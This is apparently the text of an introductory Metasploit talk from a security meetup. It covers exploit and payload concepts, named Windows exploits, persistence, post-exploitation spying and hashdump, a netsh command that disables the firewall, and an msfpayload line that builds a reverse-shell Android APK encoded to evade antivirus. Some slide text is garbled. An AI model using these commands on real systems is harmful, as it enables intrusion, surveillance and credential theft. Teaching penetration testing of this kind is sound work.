Null Hyd December Meet

1. INTRODUCTION TO
METASPLOIT
#METASPLOIT
G.Manideep,
@mani0x00
-God of Framework’s

2. #whoami
<?php
$var = “@mani0x00”;
If ($var == script kiddie){
Echo ‘security flows in blood ’;
}
Else if ($var == white hat){
Echo ‘security flows in blood’;
}
Else{
Echo ‘security flows in blood’;
}
?>
G.Manideep,
B.tech 3rd year ,E.C.E
@mani0x00

3. #Creato
r
 Developer of Metasploit
Framework.
 Chief Researcher at Boston.
 Leading provider of security
data
and analytics software and
cloud
Solutions.

4. #History
 In Oct 2003 ‘DEFCON’ Metasploit 1.0 was released
with 11 exploits
by H.D.Moore.
Firstly, it was completely coded in Perl and later
completely re-coded in Ruby.
Acquired by Rapid7 in 2009 under some terms and
conditions.
Remains open source 

5. #Getting started
#vulnerability
A Vulnerability is a weakness of a system, which
allows the attacker to Exploit the system.
VULNERABIL
ITY

6. #Getting started
#Exploit
An Exploit is an attack on a system, especially one that
takes advantage of a particular Vulnerability of the
system using Payloads.

7. #Getting started
#Payload
A Payload is a piece of code that executes in the
vulnerable system after exploitation of the system.

8. Tools
Libraries
REX
MSF core
MSF basePlugins
Modules
Auxiliary Payloads Exploits Encoders Nops
#Architecture
Interfaces
Console
CLI
WEB
Armitage

9. #libraries
rex
msf:: core
msf :: base

10. #Modules
Exploit’s
Payload’s
Auxiliary’s
Encoders
Nops

11. #Auxiliary’s
Typically, an Exploit without Payload is called
Auxiliary.
Used for scanning, fuzzing, and some
automated tasks.
Makes use of mixins.
To run type in Run.

12. #Encoders
To evade anti-viruses encoders are used.
Payload’s are encrypted.
E.g.
• Shikata_ga_nai
• Nonaplha
• Bloxor

13. #Nops
Mainly used to keep the size of the payload
consistent.
Having 8 nops.

14. #Interfaces
 #msfcli
 #msfconsole
 #msfweb
 #Armitage(GUI)

15. #Armitage (Gui)
Developed by Raphel
Mudge

16. #msfconsole
Which is a interactive console.
starting msfconsole

17. #msfconsole
Here our journey begins 
 msf >

18. #let’s attack

19. #Port scanning
which is for information gathering.
Nmap is used for port scanning.
Auxiliary’s also can be used.
As information gathering is important in pen
testing, let’s do
a traditional scanning .

20. #Port scanning
Using Auxiliary’s:

21. #Port scanning
Using Nmap:

22. #Exploitation
Mostly an attacker send’s a combination of Exploit and
Payload.
In msfconsole there are some simple commands that
makes our
work pretty easy 
some of them are (core commands):
Search Use
Set

23. #Exploitation
Using Exploit:
Just type in use <path of suggested exploit’s>
prefer the exploit which has a good ranking.

24. #Exploitation
Setting Parameters:
Just type show options and find the parameters to
be filled.
Then set the parameter by typing ‘set
<parameter> <value>’.

25. #Exploitation
Similar to Exploit’s search, search for appropriate
Payload.
Then Set using ‘set PAYLOAD’ and fill the payload
parameters.
Then Just type in “Exploit”.

26. #some successful
exploits
ms03_026dcom
ms08_067_netapi (ever green :D )
ms11_050_mshtml
ms10_042_helpctr_xss_cmd_exec
ms10_046_shortcut_icon_dllloader
dreamftp_format
distcc_exec (for linux)

27. #Maintaining access
By executing a script with some arguments as
shown below
-run persistence –S(admin priv) –i(time int) –
p(rport) –r(lhost)

28. #Maintaining access
By listening on the specified port using multi-
handler exploit

29. #Post Exploitation
Using this meterpreter we can perform different
tasks by getting
the privileges of the victim .
Can grab a screen shot’s, keylogging by loading
and much more with
• Espia
• Incognito
• Pivot
• Sniffer
• Priv

30. #Post Exploitation
Can also perform using modules.
Let’s take multiple screen shots in a certain
intervals.

31. #Post Exploitation
Margate's to another process which has admin
privileges
and then completes the task.

32. #Post Exploitation
What else we can do in post exploitation?
Let’s see some of them,
-Keylogging
-Screen shots
-view live screen
-access webcam
-take control of keyboard and mouse
-del user
-pivort
-vm detection and many more..

33. #Privilege Escalation
what can you get from the system privileges
which are used to
be protected is called Privilege escalation.
Some of them are migrating the process,
stealing the tokens to get
the desired privileges.
 Let’s take a look on some of them .

34. #Privilege Escalation
Can migrate to pid’s which has admin privileges.

35. #Privilege
Escalation
By loading Incognito, We can steal( impersonate )
the tokens
to get privileges.

36. #Privilege Escalation
To use type in impersonate_token<token>

37. #Privilege Escalation
#HashDump:
Dumps all the user’s usernames and passwords

38. #What else we
can do?
Even can sniff the packets of the victim
remotely
Evading Firewall’s
Let’s take a look

39. #Bypassing Firewall

40. #Bypassing
FirewallAfter getting a meterpreter , get access to shell and
type
> netsh firewall show opmode

41. #Bypassing Firewall
Now type
>netsh firewall set opmode mode= DISABLE

42. #Attacking Linux
Using distcc_exec

43. #Attacking Android
Using msfpayload
msfpayload android/meterpreter/reverse_tcp
LHOST=<loc-ip>
LPORT=<any> R> /(desired path for saving)<file>.apk
Install that apk file into device
if there is any anti-virus encode them with encoders

44. #Attacking Android
Listen on mentioned port using multi-handler exploit

45. #Thank you!
-
@mani0x0